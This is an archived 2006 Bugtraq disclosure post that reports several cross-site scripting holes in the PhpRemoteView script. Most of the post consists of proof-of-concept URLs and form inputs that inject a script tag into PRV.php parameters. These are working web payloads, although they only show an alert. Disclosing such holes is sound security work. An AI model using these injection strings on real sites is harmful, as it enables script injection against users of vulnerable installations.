| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: 16 May 2006 09:30:55 -0000
From: Soothackers@...il.com
To: bugtraq@...urityfocus.com
Subject: PhpRemoteView Multiple Xss Vulnerabilities
---------------------------------------------
PhpRemoteView Multiple Xss Vulnerabilities
---------------------------------------------
Site:
http://php.spb.ru/remview/
Bug:
1- http://victim/path/PRV.php?&c=v&d=[path]&f="><script>alert(/Soot/)</script>
2- http://victim/path/PRV.php?c=l&d="><script>alert(/Soot/)</script>
3-
http://victim/path/PRV.php?c=setup&ref="><script>alert(/Soot/)</script>
4-http://victim/path/PRV.php?c=d&d=[path]
MAKE DIR (type full path) : "><script>alert(/Soot/)</script>
5-http://victim/path/PRV.php?c=d&d=[path]
Full file name : "><script>alert(/Soot/)</script>
---------------------------------------------
Source :
http://soot.shabgard.org/bugs/phpremoteview.txt
Credit :
Soot
Shabgard Security Team
http://www.shabgard.org
Greetz :
Hregy,Elite,Bl2k,Littlehacker
---------------------------------------------
Powered by blists - more mailing lists